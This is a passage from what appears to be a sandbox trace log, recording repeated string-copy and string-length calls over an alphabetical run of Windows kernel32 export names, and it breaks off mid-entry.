(lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.801] lstrlenA (lpString="BEEP") returned 4 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.801] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.801] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.801] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.801] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.801] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.801] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.801] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.801] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.801] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.801] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.801] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.801] lstrlenA (lpString="CANCELIO") returned 8 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.801] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.801] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.802] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.802] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.802] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.802] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.802] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.802] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.802] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.802] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.802] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.802] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.802] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.802] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.802] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.802] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.802] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.802] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.802] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.802] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.803] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.803] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.803] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.803] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.803] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.803] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.803] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.803] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.803] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.803] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.803] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.803] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.803] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.803] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.803] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.803] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.803] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.803] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.803] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.804] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.804] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.804] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.804] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.804] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.804] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.804] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.804] lstrlenA (lpString="COPYFILEA") returned 9 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.804] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.804] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.804] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.804] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.805] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.805] lstrlenA (lpString="COPYFILEW") returned 9 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.805] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.805] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.805] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.805] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.805] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.805] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.805] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.805] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.805] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.805] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.805] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.806] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.806] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.806] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.806] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.806] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.806] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.806] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.806] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.806] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.806] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.806] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.806] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.806] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.806] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.806] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.806] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.806] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.806] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.806] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.807] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.807] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.807] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.807] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.807] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.807] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.807] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.807] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.807] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.807] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.807] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.807] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.807] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.807] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.807] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.807] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.807] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.808] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.808] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.808] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.808] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.808] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.808] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.808] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.808] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.808] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.808] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.808] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.808] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.808] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.808] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.808] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.808] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.808] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.808] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: 